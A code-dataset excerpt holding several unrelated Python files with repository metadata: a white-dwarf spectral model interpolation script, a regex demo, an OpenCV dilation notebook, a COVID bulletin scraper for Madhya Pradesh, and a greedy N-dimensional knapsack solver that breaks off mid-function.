guse = bestg-25
#newpath = '/srv/two/jtfuchs/Interpolated_Models/Koester_ML2alpha08/bottom' + str(tuse) + '_' + str(guse)
newpath = '/srv/two/jtfuchs/Interpolated_Models/Koester_ML2alpha08/bottom10000_700'
if case == 0:
os.chdir('/afs/cas.unc.edu/depts/physics_astronomy/clemens/students/group/modelfitting/Koester_08/')
if case == 1:
#newpath = '/srv/two/jtfuchs/Interpolated_Models/10teff05logg/center' + str(bestt) + '_' + str(bestg)
os.chdir(newpath)
#os.chdir('/afs/cas.unc.edu/depts/physics_astronomy/clemens/students/group/modelfitting/DA_models/Interpolated_Models/')
#Do a cubic spline interpolation to interpolate the model to even wavelength
#points at 0.1A intervals so the model can be convolved.
#Low and high wavelengths need to be 18A more than desired range
#Set lambda range from ~3650 to 6770
#The Balmer jump in the models makes the spline bulge to its left
#So start to the right of it
#Interpolate the model spectrum at 0.1 A intervals. But interp1d does not have
#a range option, so we will only feed in the portion of the spectrum we want
#to interpolate to speed things up. Again we will go a little beyond the region
#we care about to minimize edge effects of the interpolation. Will use ~3600
#to 6760
intlambda = np.divide(range(31100),10.) + 3660.0
if case == 0:
'''
filename1 = filenames[0]
filename2 = filenames[1]
filename3 = filenames[2]
#filename4 = filenames[3]
#filename5 = filenames[4]
lambdas1, inten1 = np.genfromtxt(filename1,skip_header=33,unpack=True)
lambdas2, inten2 = np.genfromtxt(filename2,skip_header=33,unpack=True)
lambdas3, inten3 = np.genfromtxt(filename3,skip_header=33,unpack=True)
#lambdas4, inten4 = np.genfromtxt(filename4,skip_header=33,unpack=True)
#lambdas5, inten5 = np.genfromtxt(filename5,skip_header=33,unpack=True)
logg1 = float(filename1[8:11])/100.
logg2 = float(filename2[8:11])/100.
logg3 = float(filename3[8:11])/100.
#logg4 = float(filename4[8:11])/100.
#logg5 = float(filename5[8:11])/100.
teff = str(filename1[2:7])
'''
lambdas = np.zeros([len(filenames),31100])
inten = np.zeros([len(filenames),31100])
fluxes = np.zeros([len(filenames),31100])
logg = np.zeros(len(filenames))
teff = str(filenames[0][2:7])
for n in np.arange(len(filenames)):
alllambda, allinten = np.genfromtxt(filenames[n],skip_header=33,unpack=True)
lowlambda = np.min(np.where(alllambda > 3600.))
highlambda = np.min(np.where(alllambda > 6800.))
shortlambdas = alllambda[lowlambda:highlambda]
shortinten = allinten[lowlambda:highlambda]
interp = InterpolatedUnivariateSpline(shortlambdas,shortinten,k=1)
fluxes[n,:] = interp(intlambda)
#lambdas[n,:] , inten[n,:] = np.genfromtxt(filenames[n],unpack=True)
logg[n] = float(filenames[n][8:11])/100.
if case ==1:
'''
filename1 = filenames[0]
filename2 = filenames[1]
filename3 = filenames[2]
filename4 = filenames[3]
filename5 = filenames[4]
lambdas1, inten1 = np.genfromtxt(filename1,unpack=True) #These are the
lambdas2, inten2 = np.genfromtxt(filename2,unpack=True) #models we have
lambdas3, inten3 = np.genfromtxt(filename3,unpack=True) #interpolated.
lambdas4, inten4 = np.genfromtxt(filename4,unpack=True)
lambdas5, inten5 = np.genfromtxt(filename5,unpack=True)
teff1 = float(filename1[2:7])
teff2 = float(filename2[2:7])
teff3 = float(filename3[2:7])
teff4 = float(filename4[2:7])
teff5 = float(filename5[2:7])
logg = str(filename1[8:12])
'''
lambdas = np.zeros([len(filenames),31100])
inten = np.zeros([len(filenames),31100])
teff = np.zeros(len(filenames))
logg = str(filenames[0][8:12])
for n in np.arange(len(filenames)):
lambdas[n,:] , inten[n,:] = np.genfromtxt(filenames[n],unpack=True)
teff[n] = float(filenames[n][2:7])
#print teff
plt.clf()
'''
if case == 0: #600:4300
lowlambda1 = np.min(np.where(lambdas1 > 3600.))
highlambda1 = np.min(np.where(lambdas1 > 6800.))
shortlambdas1 = lambdas1[lowlambda1:highlambda1]
shortinten1 = inten1[lowlambda1:highlambda1]
lowlambda2 = np.min(np.where(lambdas2 > 3600.))
highlambda2 = np.min(np.where(lambdas2 > 6800.))
shortlambdas2 = lambdas2[lowlambda2:highlambda2]
shortinten2 = inten2[lowlambda2:highlambda2]
lowlambda3 = np.min(np.where(lambdas3 > 3600.))
highlambda3 = np.min(np.where(lambdas3 > 6800.))
shortlambdas3 = lambdas3[lowlambda3:highlambda3]
shortinten3 = inten3[lowlambda3:highlambda3]
lowlambda4 = np.min(np.where(lambdas4 > 3600.))
highlambda4 = np.min(np.where(lambdas4 > 6800.))
shortlambdas4 = lambdas4[lowlambda4:highlambda4]
shortinten4 = inten4[lowlambda4:highlambda4]
lowlambda5 = np.min(np.where(lambdas5 > 3600.))
highlambda5 = np.min(np.where(lambdas5 > 6800.))
shortlambdas5 = lambdas5[lowlambda5:highlambda5]
shortinten5 = inten5[lowlambda5:highlambda5]
'''
#print 'shortlambdas1 run from ',shortlambdas1[0], '',shortlambdas1[-1]
#print 'shortlambdas2 run from ',shortlambdas2[0], '',shortlambdas2[-1]
#print 'shortlambdas3 run from ',shortlambdas3[0], '',shortlambdas3[-1]
#print 'shortlambdas4 run from ',shortlambdas4[0], '',shortlambdas4[-1]
#print 'shortlambdas5 run from ',shortlambdas5[0], '',shortlambdas5[-1]
if case == 1:
'''
interp = InterpolatedUnivariateSpline(shortlambdas1,shortinten1,k=1)
intflux = interp(intlambda)
interp2 = InterpolatedUnivariateSpline(shortlambdas2,shortinten2,k=1)
intflux2 = interp2(intlambda)
interp3 = InterpolatedUnivariateSpline(shortlambdas3,shortinten3,k=1)
intflux3 = interp3(intlambda)
interp4 = InterpolatedUnivariateSpline(shortlambdas4,shortinten4,k=1)
intflux4 = interp4(intlambda)
interp5 = InterpolatedUnivariateSpline(shortlambdas5,shortinten5,k=1)
intflux5 = interp5(intlambda)
'''
fluxes = np.zeros([len(filenames),31100])
for n in np.arange(len(filenames)):
interp = InterpolatedUnivariateSpline(lambdas[n,:],inten[n,:],k=1)
fluxes[n,:] = interp(intlambda)
#plot the interpolated spectra
#plt.plot(intlambda,intflux,'ro',label='7.0')
#plt.plot(intlambda,intflux2,'b^',label='7.25')
#plt.plot(intlambda,intflux3,'m*',label='7.5')
#plt.plot(intlambda,intflux4,'gs',label='8.25')
#plt.plot(intlambda,intflux5,'cp',label='8.5')
#plt.show()
#Now do the 2D interpolation
if case == 0:
xval = logg
#xval = np.array([logg1,logg2,logg3,logg4,logg5]) #This is our x
#fluxes = np.array([intflux,intflux2,intflux3])#This is our z
if case == 1:
xval = teff
# xval = np.array([teff1,teff2,teff3,teff4,teff5]) #This is our x
# fluxes = np.array([intflux,intflux2,intflux3,intflux4,intflux5]) #This is our z
#intlambda is our y
print 'Starting 2D interpolation'
#print xval
out = RectBivariateSpline(xval,intlambda,fluxes,kx=1,ky=1,s=0)
print 'Done with the 2D interpolation. Starting to read off new values.'
#Iterate over the output to build an array with the new fluxes
#Need to set up an array that is of size grid by intlambda
intfluxes = []
for x in grid:
#print x
for i in intlambda:
new = float(out([x],[i]))
if i == 3660:
newflux = [new]
else:
newflux.append(new)
intfluxes.append(newflux)
#if x == 10410:
# plt.clf()
# plt.plot(intlambda,newflux,'r^',label='Interp')
# #plt.show()
# #plt.clf()
# plt.plot(lambdas[4,:], inten[4,:],'bs',label='Model')
# plt.legend()
# plt.show()
#if case == 1:
# plt.clf()
# plt.plot(intlambda,intfluxes[39],'b',label='Interp - 8.2')
# plt.plot(intlambda,intfluxes[40],'r',label='Interp - 7.85')
# plt.plot(intlambda,intfluxes[41],'g')
# plt.plot(intlambda,intfluxes[42],'c,')
# #plt.legend()
# plt.show()
#Write and save files
print 'Starting to save files.'
os.chdir(newpath)
if case == 0:
newg = np.multiply(grid,1000.)
n = 0
for x in newg:
thisg = str(x)
thisg = thisg[:-2]
newfile = 'da' + str(teff) + '_' + thisg + '.jf'
np.savetxt(newfile,np.transpose([intlambda,intfluxes[n]]))
#Write out last file saved and time
now = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M")
f = open('lastsaved.txt','a')
f.write(newfile + ',' + now + '\n')
f.close()
n += 1
if case ==1:
n = 0
for x in grid:
thist = str(x)
thist = thist[:-2]
newfile = 'da' + thist + '_' + logg + '.jf'
np.savetxt(newfile,np.transpose([intlambda,intfluxes[n]]))
#Write out last file saved and time
now = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M")
f = open('lastsaved.txt','a')
f.write(newfile + ',' + now + '\n')
f.close()
n += 1
| 10,042 | 0 | 33 |
c1ee6f4947657113b61bda3ebddde056c335a43e | 177 | py | Python | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_RegEx_mutch_object_2.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 5 | 2021-06-02T23:44:25.000Z | 2021-12-27T16:21:57.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_RegEx_mutch_object_2.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 22 | 2021-05-31T01:33:25.000Z | 2021-10-18T18:32:39.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_RegEx_mutch_object_2.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 3 | 2021-06-19T03:37:47.000Z | 2021-08-31T00:49:51.000Z | import re
# Locate the first word that begins with an upper case "S" and print its offsets.
txt = "The rain in Spain"
pattern = re.compile(r"\bS\w+")  # \b anchors to a word boundary, \w+ takes the rest of the word
x = pattern.search(txt)
print(x.span())  # -> the (start, end) offsets of "Spain"
| 22.125 | 92 | 0.683616 | import re
# Locate the first word that begins with an upper case "S" and print its offsets.
txt = "The rain in Spain"
pattern = re.compile(r"\bS\w+")  # \b anchors to a word boundary, \w+ takes the rest of the word
x = pattern.search(txt)
print(x.span())  # -> the (start, end) offsets of "Spain"
| 0 | 0 | 0 |
574d913190a685e09ec510612cf6538d5b689ad0 | 2,203 | py | Python | Dilation.py | gmagannaDevelop/MorphoImg | 751985a430f3ab9f8ded7a18fdeb2eb41cb112e5 | [
"MIT"
] | 1 | 2019-11-18T14:54:11.000Z | 2019-11-18T14:54:11.000Z | Dilation.py | gmagannaDevelop/MorphoImg | 751985a430f3ab9f8ded7a18fdeb2eb41cb112e5 | [
"MIT"
] | 7 | 2020-03-24T17:49:09.000Z | 2022-01-13T01:51:33.000Z | Dilation.py | gmagannaDevelop/MorphoImg | 751985a430f3ab9f8ded7a18fdeb2eb41cb112e5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# Jupyter-notebook export ("In[..]" markers are the original cell numbers).
# Demonstrates morphological dilation (cv2.dilate) with assorted structuring
# elements, first on a binarised image and then on a scanned text page.
# In[31]:
from typing import Optional, Callable, Tuple, List, NoReturn
from functools import partial, reduce
import matplotlib.pyplot as plt
import matplotlib.image as img
import numpy as np
import cv2 as cv
import PIL as pil
# In[2]:
# User-defined functions, utils module found in the same directory as Erosion.ipynb
from utils import binarise, side_by_side
# In[3]:
# Load the sample image.
x = img.imread('imagenes/Im1T4.png')
# In[4]:
plt.imshow(x, cmap='gray')
# In[5]:
# Invert the image (assumes pixel values lie in [0, 1] -- TODO confirm).
x = 1 - x
# In[6]:
plt.imshow(x, cmap='gray')
# In[7]:
# Threshold the inverted image to a binary mask.
binaria = binarise(x)
plt.imshow(binaria, cmap='gray')
# In[8]:
help(cv.dilate)
# In[9]:
# Dilate with a 10x10 all-ones structuring element and compare side by side.
kernel = np.ones((10, 10))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[10]:
# A short, wide kernel grows the shapes horizontally...
kernel = np.ones((2, 50))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[11]:
# ...and a tall, narrow kernel grows them vertically.
kernel = np.ones((50, 2))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# # Example found on page 643
# In[12]:
# Load the text scan as grayscale (flag 0 = cv2.IMREAD_GRAYSCALE).
text = cv.imread('imagenes/text.png', 0)
text.shape
# In[13]:
plt.imshow(text, cmap='gray')
# In[14]:
# Binarise the scan with an explicit threshold.
text2 = binarise(text, threshold=115)
plt.imshow(text2, cmap='gray')
# In[15]:
# 1x1 ones kernel: dilation is effectively a no-op; baseline for comparison.
kernel = np.ones((1, 1))
side_by_side(text2, cv.dilate(text2, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[16]:
# Zoom into the bottom-right corner to see the 3x3 dilation per glyph.
kernel = np.ones((3, 3))
side_by_side(text2[400:, 400:], cv.dilate(text2[400:, 400:], kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[17]:
kernel = np.ones((15, 15))
side_by_side(text2, cv.dilate(text2, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[ ]:
# In[43]:
# A single bright pixel: dilating it paints the structuring element itself.
A = np.zeros((11, 11))
A[5, 5] = 1
plt.grid()
plt.imshow(A, cmap='gray')
# In[42]:
# Kernel decomposition: dilating by 3x1 and then 1x3 equals one 3x3 pass.
B = [A, np.ones((3, 1)), np.ones((1, 3))]
dilate_decomposed = reduce(lambda x, y: cv.dilate(x, y), B)
plt.grid()
plt.imshow(dilate_decomposed, cmap='gray')
# In[49]:
# Hand-made, non-rectangular 3x3 structuring element (uint8 as cv2 expects).
y = np.array([1, 1, 0, 0, 1, 1, 0, 1, 0])
y.shape = 3, 3
y = np.uint8(y)
y
# In[52]:
side_by_side(A, cv.dilate(A, y))
# In[40]:
np.ones((3, 1))
# In[ ]:
# NOTE(review): `reverse` is not defined anywhere above -- this stray notebook
# cell raises NameError if the script is executed top to bottom.
reverse
| 12.517045 | 121 | 0.639128 | #!/usr/bin/env python
# coding: utf-8
# Jupyter-notebook export ("In[..]" markers are the original cell numbers).
# Demonstrates morphological dilation (cv2.dilate) with assorted structuring
# elements, first on a binarised image and then on a scanned text page.
# In[31]:
from typing import Optional, Callable, Tuple, List, NoReturn
from functools import partial, reduce
import matplotlib.pyplot as plt
import matplotlib.image as img
import numpy as np
import cv2 as cv
import PIL as pil
# In[2]:
# User-defined functions, utils module found in the same directory as Erosion.ipynb
from utils import binarise, side_by_side
# In[3]:
# Load the sample image.
x = img.imread('imagenes/Im1T4.png')
# In[4]:
plt.imshow(x, cmap='gray')
# In[5]:
# Invert the image (assumes pixel values lie in [0, 1] -- TODO confirm).
x = 1 - x
# In[6]:
plt.imshow(x, cmap='gray')
# In[7]:
# Threshold the inverted image to a binary mask.
binaria = binarise(x)
plt.imshow(binaria, cmap='gray')
# In[8]:
help(cv.dilate)
# In[9]:
# Dilate with a 10x10 all-ones structuring element and compare side by side.
kernel = np.ones((10, 10))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[10]:
# A short, wide kernel grows the shapes horizontally...
kernel = np.ones((2, 50))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[11]:
# ...and a tall, narrow kernel grows them vertically.
kernel = np.ones((50, 2))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# # Example found on page 643
# In[12]:
# Load the text scan as grayscale (flag 0 = cv2.IMREAD_GRAYSCALE).
text = cv.imread('imagenes/text.png', 0)
text.shape
# In[13]:
plt.imshow(text, cmap='gray')
# In[14]:
# Binarise the scan with an explicit threshold.
text2 = binarise(text, threshold=115)
plt.imshow(text2, cmap='gray')
# In[15]:
# 1x1 ones kernel: dilation is effectively a no-op; baseline for comparison.
kernel = np.ones((1, 1))
side_by_side(text2, cv.dilate(text2, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[16]:
# Zoom into the bottom-right corner to see the 3x3 dilation per glyph.
kernel = np.ones((3, 3))
side_by_side(text2[400:, 400:], cv.dilate(text2[400:, 400:], kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[17]:
kernel = np.ones((15, 15))
side_by_side(text2, cv.dilate(text2, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[ ]:
# In[43]:
# A single bright pixel: dilating it paints the structuring element itself.
A = np.zeros((11, 11))
A[5, 5] = 1
plt.grid()
plt.imshow(A, cmap='gray')
# In[42]:
# Kernel decomposition: dilating by 3x1 and then 1x3 equals one 3x3 pass.
B = [A, np.ones((3, 1)), np.ones((1, 3))]
dilate_decomposed = reduce(lambda x, y: cv.dilate(x, y), B)
plt.grid()
plt.imshow(dilate_decomposed, cmap='gray')
# In[49]:
# Hand-made, non-rectangular 3x3 structuring element (uint8 as cv2 expects).
y = np.array([1, 1, 0, 0, 1, 1, 0, 1, 0])
y.shape = 3, 3
y = np.uint8(y)
y
# In[52]:
side_by_side(A, cv.dilate(A, y))
# In[40]:
np.ones((3, 1))
# In[ ]:
# NOTE(review): `reverse` is not defined anywhere above -- this stray notebook
# cell raises NameError if the script is executed top to bottom.
reverse
| 0 | 0 | 0 |
5059b78da4509944d16af0cb21a27524244a0d2b | 1,621 | py | Python | data_extractor/bulletin_download/states/MP.py | IBM/covid19-india-data | e2be04e74e753fbd1b1580f62856bf7335b95d33 | [
"MIT"
] | 20 | 2021-08-15T19:00:57.000Z | 2022-03-28T21:23:28.000Z | data_extractor/bulletin_download/states/MP.py | IBM/covid19-india-data | e2be04e74e753fbd1b1580f62856bf7335b95d33 | [
"MIT"
] | 78 | 2021-08-17T22:34:39.000Z | 2022-01-06T02:49:30.000Z | data_extractor/bulletin_download/states/MP.py | IBM/covid19-india-data | e2be04e74e753fbd1b1580f62856bf7335b95d33 | [
"MIT"
] | 8 | 2021-08-30T19:35:27.000Z | 2022-02-08T14:07:10.000Z | from .bulletin import Bulletin
from bs4 import BeautifulSoup
import re
| 26.145161 | 116 | 0.555213 | from .bulletin import Bulletin
from bs4 import BeautifulSoup
import re
class MadhyaPradesh(Bulletin):
    """Bulletin downloader for Madhya Pradesh (state code 'MP')."""

    def __init__(self, basedir):
        """Initialise the shared Bulletin machinery with this state's code."""
        statename = 'MP'
        super().__init__(basedir, statename)

    def get_bulletin_links(self):
        """Scrape the MP health-bulletin index page.

        Returns a dict mapping a normalised date string to the bulletin URL.
        Hindi bulletins and duplicate dates are skipped.
        """
        burl = "http://sarthak.nhmmp.gov.in/covid/health-bulletin"
        html = self.get_url_html(burl)
        soup = BeautifulSoup(html, 'html.parser')
        bulletin_links = dict()
        for anchor in soup.find_all('a'):
            anchor_href = anchor.get('href')
            if not anchor_href:
                continue
            # Dates appear inside hrefs as e.g. "21.06.2021"; the unescaped
            # dots deliberately tolerate "_" (or any other) separator chars.
            match = re.search(r'(\d+.\d+.202\d+)', anchor_href)
            if not match:
                continue
            date_time_str = match.group(1)
            # Normalise known site quirks: "_" separators and a doubled year.
            date_time_str = date_time_str.replace("_", ".")
            date_time_str = date_time_str.replace("202020", "2020")
            if len(date_time_str) == 8:
                # Treat an 8-char match as separator-less "DDMMYYYY".
                # NOTE(review): a short date such as "1.2.2021" is also 8 chars
                # and would be mangled here -- relies on zero-padded dates.
                date_time_str = "{}.{}.{}".format(date_time_str[0:2], date_time_str[2:4], date_time_str[4:])
            try:
                datestr = self.get_date_str(date_time_str, datefmts=['%d.%m.%Y'])
                if datestr in bulletin_links or "hindi" in anchor_href.lower():
                    continue
                bulletin_links[datestr] = anchor_href
            except Exception:
                # Unparseable date -> skip this link.  Was a bare "except: pass",
                # which also swallowed KeyboardInterrupt/SystemExit.
                pass
        return bulletin_links

    def run(self):
        """Scrape the link index, download every bulletin, and persist state."""
        print(f'\t Downloading Madhya Pradesh bulletins')
        bulletin_links = self.get_bulletin_links()
        self.download_bulletins(bulletin_links)
        self._save_state_()
        return bulletin_links
| 1,434 | 9 | 104 |
3ece990d3b54f8ff05c83892af36a81d65bbf73f | 11,159 | py | Python | python3/knapsack/greedyNdKnapsack.py | CostaBru/knapsack | cdd95de759c20b0cdeef4064fbbed10df1ab76d0 | [
"MIT"
] | 1 | 2021-03-06T16:38:28.000Z | 2021-03-06T16:38:28.000Z | python3/knapsack/greedyNdKnapsack.py | CostaBru/knapsack | cdd95de759c20b0cdeef4064fbbed10df1ab76d0 | [
"MIT"
] | null | null | null | python3/knapsack/greedyNdKnapsack.py | CostaBru/knapsack | cdd95de759c20b0cdeef4064fbbed10df1ab76d0 | [
"MIT"
] | null | null | null | """
Copyright Jun 2021 Konstantin Briukhnov (kooltew at gmail.com) (@CostaBru). San-Francisco Bay Area.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from flags.flags import doUseLimits, doSolveSuperInc
from .knapsack import knapsackSolver
from .knapsackNd import knapsackNSolver
from .knapsackPareto import *
from collections import defaultdict
from collections import deque
from decimal import Decimal
import time
import math
import sys
from .paretoPoint import paretoPoint, paretoPoint1
from .wPoint import wPoint1
| 42.919231 | 268 | 0.605879 | """
Copyright Jun 2021 Konstantin Briukhnov (kooltew at gmail.com) (@CostaBru). San-Francisco Bay Area.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from flags.flags import doUseLimits, doSolveSuperInc
from .knapsack import knapsackSolver
from .knapsackNd import knapsackNSolver
from .knapsackPareto import *
from collections import defaultdict
from collections import deque
from decimal import Decimal
import time
import math
import sys
from .paretoPoint import paretoPoint, paretoPoint1
from .wPoint import wPoint1
class greedyKnapsackNdSolver:
    """Greedy top-down heuristic for the N-dimensional knapsack problem.

    One 1D Pareto solver is prepared per dimension.  `solve` then walks the
    per-dimension constraints downwards in "stair steps", unions the item
    indexes the 1D solvers select at their current limits, and runs the exact
    N-D solver on that reduced candidate set, keeping the best value seen.
    """

    def __init__(self, constraints, items, values, iterCounter, emptyPoint, forceUseLimits=False, forceUseDpSolver=False):
        self.constraints = constraints
        self.items = items
        self.values = values
        # Mutable counter shared with sub-solvers; iterCounter[0] accumulates
        # an estimate of the work performed.
        self.iterCounter = iterCounter
        self.forceUseLimits = forceUseLimits
        self.emptyPoint = emptyPoint
        self.size = constraints.getSize()
        self.useParetoGreedy = False
        self.totalPointCount = 0
        # Diagnostic / tuning flags consumed by the solver methods below.
        self.printDpInfo = False
        self.printGreedyInfo = False
        self.printSuperIncreasingInfo = False
        self.doSolveSuperInc = True
        self.canBackTraceWhenSizeReached = False
        self.useRatioSortForPareto = False

    def createNewPoint(self, tuples):
        """Build a new N-D point of the same type as the configured empty point."""
        return self.emptyPoint.createNew(tuples)

    def sortBoth(self, w, v, reverse=True):
        """Sort two parallel sequences together by (w, v); returns two lists."""
        sorted_pairs = sorted(zip(w, v), reverse=reverse, key=lambda t: (t[0], t[1]))
        tuples = zip(*sorted_pairs)
        # Loop variable renamed: the original shadowed the builtin `tuple`.
        return [list(grouped) for grouped in tuples]

    def sortReverse3Both(self, w, v, x):
        """Sort three parallel sequences together, descending by (w, v); returns three lists."""
        sorted_pairs = sorted(zip(w, v, x), reverse=True, key=lambda t: (t[0], t[1]))
        tuples = zip(*sorted_pairs)
        return [list(grouped) for grouped in tuples]

    def solveByPareto(self, constraints, lessSizeItems, lessSizeValues, iterCounter):
        """Run the non-exact N-D Pareto solver on a reduced item set."""
        if self.printGreedyInfo:
            print(f"{constraints.getSize()}D knapsack NON exact pareto solver: N {len(lessSizeItems)}")
        paretoSolver = knapsackParetoSolver(lessSizeItems, lessSizeValues, range(len(lessSizeValues)), constraints,
                                            paretoPoint(self.emptyPoint.getDimensions(), 0), self.emptyPoint, iterCounter)
        paretoSolver.printInfo = self.printDpInfo
        paretoSolver.canBackTraceWhenSizeReached = self.canBackTraceWhenSizeReached
        paretoSolver.useRatioSort = self.useRatioSortForPareto
        opt, optDims, optItems, optValues, optIndex = paretoSolver.solve()
        return opt, optDims, optItems, optValues

    def solveKnapsackNd(self, constraints, descNewDims, descNewVals, doSolveSuperInc, forceUseLimits, iterCounter):
        """Run the exact N-D DP solver (limits forced on) over the given candidates."""
        limitSolver = knapsackNSolver(constraints, descNewDims, descNewVals, iterCounter, self.emptyPoint, forceUseLimits=True, forceUseDpSolver=True)
        return limitSolver.solve()

    def solve(self):
        """Execute the greedy top-down search.

        Returns (maxN, maxDimN, maxNItems, maxNValues): the best total value
        found, its accumulated dimension point, and the chosen items/values.
        """
        size = self.constraints.getSize()
        maxN = -sys.maxsize
        maxDimN = self.emptyPoint
        maxNItems = []
        maxNValues = []
        dimDescSortedItems = [None] * size
        dimStairSteps = [None] * size
        optimizeCacheItems = [None] * size
        solvers = [None] * size
        dimStairDownCursors = [0] * size
        dimStairDownCursorStartings = [0] * size
        estimatedAttemptsCount = 0
        _, dimensionIndexes = self.sortBoth(self.constraints.getDimensions(), range(size), reverse=False)
        # Per-dimension preparation: projected item weights, the stair step
        # (taken from the last item's projected weight), and a 1D Pareto solver.
        for dimensionIndex in range(size):
            dimOrderIndex = dimensionIndexes[dimensionIndex]
            descDim = [p.getDimension(dimOrderIndex) for p in self.items]
            descValues = self.values
            descIndex = list(range(len(self.values)))
            self.iterCounter[0] += (len(descDim) * math.log2(len(descDim)))
            dimDescSortedItems[dimensionIndex] = (descDim, descValues, descIndex)
            dimStairSteps[dimensionIndex] = descDim[-1]
            dimStairDownCursors[dimensionIndex] = self.constraints.getDimension(dimOrderIndex)
            dimStairDownCursorStartings[dimensionIndex] = self.constraints.getDimension(dimOrderIndex)
            optimizeCacheItems[dimensionIndex] = {}
            estimatedAttemptsCount += dimStairDownCursors[dimensionIndex] // dimStairSteps[dimensionIndex]
            solver = knapsackParetoSolver([wPoint1(item) for item in descDim],
                                          descValues,
                                          range(len(descValues)),
                                          wPoint1(self.constraints.getDimension(dimOrderIndex)),
                                          paretoPoint1(0, 0),
                                          wPoint1(0),
                                          self.iterCounter)
            solver.forceUsePareto = True
            solver.prepareSearchIndex = True
            solvers[dimensionIndex] = solver
        if self.printGreedyInfo:
            print(f"The NON exact {size}D greedyTopDown knapsack solver called for N = {len(self.items)}. Estimated attempts: {estimatedAttemptsCount}.")
        self.iterCounter[0] += size
        t0 = time.perf_counter()
        optimizeIterIndex = 0
        anyGreaterThanStep = True
        prevOptimizedIndexes = set()
        while anyGreaterThanStep:
            t1 = time.perf_counter()
            optimizedIndexes = set()
            # Union the item indexes each 1D solver picks at its current limit,
            # caching the per-(dimension, limit) results.
            for dimensionIndex in range(size):
                currentDimLimit = dimStairDownCursors[dimensionIndex]
                if currentDimLimit not in optimizeCacheItems[dimensionIndex]:
                    _, __, ___, ____, optIndex = solvers[dimensionIndex].solve(wPoint1(currentDimLimit))
                    dimIndex = dimDescSortedItems[dimensionIndex][2]
                    dimCacheItems = []
                    for oi in optIndex:
                        itemIndex = dimIndex[oi]
                        dimCacheItems.append(itemIndex)
                        optimizedIndexes.add(itemIndex)
                    self.iterCounter[0] += len(optIndex)
                    optimizeCacheItems[dimensionIndex][currentDimLimit] = dimCacheItems
                else:
                    optimizedIndexes.update(optimizeCacheItems[dimensionIndex][currentDimLimit])
                    self.iterCounter[0] += len(optimizeCacheItems[dimensionIndex])
            newData = []
            newValues = []
            optTuple = tuple(optimizedIndexes)
            if optTuple not in prevOptimizedIndexes:
                # Materialise the reduced candidate set as N-D points.
                sumOfNewValues = 0
                for itemIndex in optimizedIndexes:
                    nDims = [0] * size
                    for dimensionIndex in range(size):
                        dimIndex = dimensionIndexes[dimensionIndex]
                        nDims[dimIndex] = self.items[itemIndex].getDimension(dimIndex)
                    newData.append(self.createNewPoint(nDims))
                    newValues.append(self.values[itemIndex])
                    sumOfNewValues += self.values[itemIndex]
                self.iterCounter[0] += len(optimizedIndexes) * size
                if sumOfNewValues > maxN:
                    # Only worth an exact N-D pass if this candidate set could
                    # possibly beat the best value found so far.
                    descNewDims, descNewVals = self.sortBoth(newData, newValues)
                    self.iterCounter[0] += (len(descNewDims) * math.log2(len(descNewDims)))
                    optN, optDimN, optItemsN, optValuesN = self.solveKnapsackNd(self.constraints,
                                                                                descNewDims,
                                                                                descNewVals,
                                                                                doSolveSuperInc,
